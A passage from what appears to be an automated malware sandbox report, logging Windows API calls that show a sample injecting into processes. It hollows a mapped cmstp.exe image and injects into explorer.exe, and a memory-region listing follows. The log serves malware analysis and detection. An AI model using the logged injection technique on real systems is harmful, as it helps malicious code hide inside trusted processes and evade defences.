[32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x6, [73]=0x84, [74]=0x36, [75]=0xdf, [76]=0x26, [77]=0x8b, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x1, SegGs=0x0, SegFs=0x616920, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xffffffff, SegCs=0xffffffff, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf0, [5]=0xcf, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x38, [23]=0x5d, [24]=0xfc, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x40, [29]=0x41, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0xce, [39]=0x5c, [40]=0xfc, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0xe8, [46]=0x72, [47]=0xa, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x30, [213]=0xf1, [214]=0x25, [215]=0xb7, [216]=0xef, [217]=0x47, [218]=0x1a, [219]=0x10, [220]=0xa5, [221]=0xf1, [222]=0x2, [223]=0x60, [224]=0x8c, [225]=0x9e, [226]=0xeb, [227]=0xac, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0113.437] NtQueueApcThread (ThreadHandle=0xac, ApcRoutine=0xa72e909, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0113.442] NtResumeThread (in: ThreadHandle=0xac, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0113.443] NtClose (Handle=0xa8) returned 0x0 [0113.443] NtClose (Handle=0xac) returned 0x0 [0113.443] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x19e05c | out: BaseAddress=0x19e05c*=0x76300000) returned 0x0 [0113.513] PostThreadMessageW (idThread=0x668, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0113.984] NtDelayExecution (Alertable=0, Interval=0x19e0d4*=-30000000) returned 0x0 [0116.995] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0xa774000, Buffer=0x19e0f8, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x19e0f8*, NumberOfBytesRead=0x0) returned 0x0 [0116.995] NtClose (Handle=0x80) returned 0x0 [0116.995] NtOpenProcess (in: ProcessHandle=0x19f1d4, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x3f8, UniqueThread=0x0) | out: ProcessHandle=0x19f1d4*=0x80) returned 0x0 [0116.999] NtOpenThread (in: ThreadHandle=0x19f1d8, DesiredAccess=0x1a, ObjectAttributes=0x19ea94, ClientId=0x19ea60*(UniqueProcess=0x0, UniqueThread=0x154) | out: ThreadHandle=0x19f1d8*=0xb8) returned 0x0 [0116.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\cmstp.exe", NtPathName=0x19e098, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\cmstp.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.999] NtCreateFile (in: FileHandle=0x19e0b8, DesiredAccess=0x120089, ObjectAttributes=0x19e080*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\cmstp.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e0a0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e0b8*=0xbc, IoStatusBlock=0x19e0a0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0116.999] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x478090) returned 1 [0116.999] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19e0a0, FileInformation=0x19dff8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19e0a0, FileInformation=0x19dff8) returned 0x0 [0116.999] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14a00) returned 0x47a788 [0117.006] NtReadFile (in: FileHandle=0xbc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19e0a0, Buffer=0x47a788, BufferLength=0x14600, ByteOffset=0x19e010*=0, Key=0x0 | out: IoStatusBlock=0x19e0a0, Buffer=0x47a788*) returned 0x0 [0117.008] NtClose (Handle=0xbc) returned 0x0 [0117.008] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x17001) returned 0x48f190 [0117.010] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a788) returned 1 [0117.010] NtQueryInformationProcess (in: ProcessHandle=0x80, ProcessInformationClass=0x0, ProcessInformation=0x19e404, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e404, ReturnLength=0x0) returned 0x0 [0117.010] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0x357008, Buffer=0x19efc8, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x19efc8*, NumberOfBytesRead=0x0) returned 0x0 [0117.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x570000, RegionSize=0x19eab0, FreeType=0x8000) returned 0x0 [0117.011] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0x1090000, Buffer=0x48f190, NumberOfBytesToRead=0x17000, NumberOfBytesRead=0x0 | out: Buffer=0x48f190*, NumberOfBytesRead=0x0) returned 0x0 [0117.013] NtCreateSection (in: SectionHandle=0x19f264, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19f264*=0xbc) returned 0x0 [0117.013] NtMapViewOfSection (in: SectionHandle=0xbc, ProcessHandle=0xffffffff, BaseAddress=0x19f260*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19f260*=0xcc0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x29000) returned 0x0 [0117.014] NtMapViewOfSection (in: SectionHandle=0xbc, ProcessHandle=0x80, BaseAddress=0x19ed20*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ef4c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed20*=0x110000, SectionOffset=0x0, ViewSize=0x19ef4c*=0x29000) returned 0x0 [0117.016] NtCreateSection (in: SectionHandle=0x19efc0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eac8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19efc0*=0xc0) returned 0x0 [0117.016] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xffffffff, BaseAddress=0x19efc4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eac8*=0x17000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc4*=0x570000, SectionOffset=0x0, ViewSize=0x19eac8*=0x17000) returned 0x0 [0117.019] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x48f190) returned 1 [0117.024] NtUnmapViewOfSection (ProcessHandle=0x80, BaseAddress=0x1090000) returned 0x0 [0117.025] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0x80, BaseAddress=0x19efc8*=0x1090000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f1f4*=0x17000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc8*=0x1090000, SectionOffset=0x0, ViewSize=0x19f1f4*=0x17000) returned 0x0 [0117.038] NtResumeThread (in: ThreadHandle=0xb8, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0117.042] ExitProcess (uExitCode=0x0) Thread: id = 7 os_tid = 0x6ec Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x37928000" os_pid = "0x664" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 426 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 427 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 428 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 429 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 430 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 431 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 432 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 433 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 434 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 435 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 436 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 437 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 438 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 439 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 440 start_va = 0x410000 end_va = 0x412fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 441 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 442 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 443 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 444 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 445 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 446 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 447 start_va = 0x4e0000 end_va = 0x4f2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 448 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 449 start_va = 0x510000 end_va = 0x528fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db") Region: id = 450 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 451 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 452 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 453 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 454 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 455 start_va = 0x670000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 456 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 457 start_va = 0x990000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 458 start_va = 0x1d90000 end_va = 0x218afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d90000" filename = "" Region: id = 459 start_va = 0x2190000 end_va = 0x21bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 460 start_va = 0x21c0000 end_va = 0x21c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 461 start_va = 0x21d0000 end_va = 0x21d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 462 start_va = 0x21e0000 end_va = 0x21e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 463 start_va = 0x21f0000 end_va = 0x21f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 464 start_va = 0x2200000 end_va = 0x2201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 465 start_va = 0x2210000 end_va = 0x2211fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 466 start_va = 0x2220000 end_va = 0x2221fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002220000" filename = "" Region: id = 467 start_va = 0x2230000 end_va = 0x2231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 468 start_va = 0x2260000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 469 start_va = 0x2270000 end_va = 0x2271fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 470 start_va = 0x2280000 end_va = 0x2281fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 471 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 472 start_va = 0x22a0000 end_va = 0x22a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 473 start_va = 0x22b0000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 474 start_va = 0x22c0000 end_va = 0x25f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 475 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 476 start_va = 0x2680000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 477 start_va = 0x2700000 end_va = 0x2701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002700000" filename = "" Region: id = 478 start_va = 0x2710000 end_va = 0x2717fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 479 start_va = 0x2720000 end_va = 0x2723fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 480 start_va = 0x2740000 end_va = 0x2741fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 481 start_va = 0x2750000 end_va = 0x2751fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 482 start_va = 0x2760000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 483 start_va = 0x2770000 end_va = 0x2771fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 484 start_va = 0x2780000 end_va = 0x285ffff monitored = 0 entry_point = 0x0 region_type = 